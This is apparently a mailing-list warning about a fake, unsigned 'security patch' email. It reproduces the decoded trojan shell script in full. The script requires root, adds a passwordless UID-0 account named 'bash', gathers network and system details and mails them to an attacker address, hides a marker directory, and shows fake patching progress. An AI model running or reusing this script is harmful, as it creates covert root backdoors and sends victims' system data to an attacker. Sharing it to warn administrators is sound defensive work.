Be advised.<snip>
The message below is currently going around on internet. Being unsinged
was the fist obvious issue. Not pointing to RPM updates, being in a
different format and such were among the other reasong to suspect it.
Message was send from 'University of Texas at Arlington'.
I am sure none of you should be fooled by such a message but other might
be.
And while it lasts you may want to get the file for your own educational
purposes.
shll[] decodes to: /bin/sh inlo[] decodes to: -c xecc[] decodes to: exec '%s' "$@" lsto[] decodes to a null string. chk1[] decodes to: KTZE4lIVf7i4BR
#!/bin/sh
cd /tmp/
clear
if [ `id -u` != "0" ]
then
echo "This patch must be applied as \"root\", and you are: \"`whoami`\""
exit
fi
echo "Identifying the system. This may take up to 2 minutes. Please wait ..."
sleep 3
if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then
echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@xxxxxxxxxxxxxx >> /dev/null
rm -rf /tmp/mama
mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." "
fi
bla() { sleep 2 echo -n "#" sleep 1 echo -n "#" sleep 1 echo -n "#" sleep 2 echo -n "#" sleep 1 echo -n "#" sleep 1 echo -n "#" sleep 3 echo -n "#" sleep 1 echo -n "#" sleep 4 echo -n "#" sleep 1 echo -n "#" sleep 1 echo "#" sleep 1 }
echo "System looks OK. Proceeding to next step."
sleep 1
echo
echo -n "Patching \"ls\": "
bla
echo -n "Patching \"mkdir\": "
bla
echo
echo "System updated and secured successfuly. You may erase these files."
sleep 1
Attachment:
PGP.sig
Description: This is a digitally signed message part